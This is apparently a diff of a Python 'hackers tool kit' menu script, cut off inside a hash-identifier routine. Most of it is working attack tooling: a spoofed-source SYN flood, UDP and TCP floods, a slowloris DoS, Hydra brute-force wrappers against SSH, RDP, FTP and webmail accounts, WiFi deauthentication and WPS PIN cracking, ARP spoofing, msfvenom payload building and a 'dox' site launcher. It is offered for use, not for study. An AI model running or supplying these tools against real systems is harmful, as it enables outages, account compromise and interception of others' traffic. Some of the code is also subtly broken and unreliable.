\033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + 